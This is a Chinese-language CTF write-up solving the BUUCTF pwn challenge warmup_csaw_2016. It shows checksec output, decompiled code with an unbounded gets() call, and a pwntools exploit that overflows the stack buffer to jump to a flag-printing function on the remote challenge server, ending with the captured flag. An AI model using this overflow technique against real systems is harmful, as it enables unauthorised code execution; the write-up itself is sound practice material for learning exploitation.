BUUCTF-PWN爬坑-03-warmup_csaw_2016
阿新 • • 發佈:2021-01-19
warmup_csaw_2016
- 1.file
root@kali:~/Downloads# file warmup_csaw_2016
warmup_csaw_2016: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=7b7d75c51503566eb1203781298d9f0355a66bd3, stripped
64位程式
- 2.checksec
root@kali:~/Downloads# checksec warmup_csaw_2016
[*] '/root/Downloads/warmup_csaw_2016'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE
無保護
- 3.IDA
__int64 __fastcall main(__int64 a1, char **a2, char **a3) { char s; // [rsp+0h] [rbp-80h] char v5; // [rsp+40h] [rbp-40h] write(1, "-Warm Up-\n", 0xAuLL); write(1, "WOW:", 4uLL); sprintf(&s, "%p\n", sub_40060D); write(1, &s, 9uLL); write(1, ">", 1uLL); return gets(&v5, ">"); }
執行結果
root@kali:~/Downloads# ./warmup_csaw_2016
-Warm Up-
WOW:0x40060d
>12
檢視 sub_40060D
int sub_40060D()
{
return system("cat flag.txt");
}
可利用這個函式
構造exp
#!/usr/bin/python3 #coding=utf-8 from pwn import * port = 25397 p = remote('node3.buuoj.cn',port) payload = b'a'*0x40 + b'b'*8 + p64(0x40060d) p.sendline(payload) p.interactive()
exp 執行結果
root@kali:~/Downloads# python3 exp_warmup_csaw_2016.py
[+] Opening connection to node3.buuoj.cn on port 25397: Done
[*] Switching to interactive mode
-Warm Up-
WOW:0x40060d
>flag{7fe33307-500a-42af-a7a6-b9a039f20b8f}
timeout: the monitored command dumped core
[*] Got EOF while reading in interactive
$
以上為個人做題思路歡迎大家討論學習。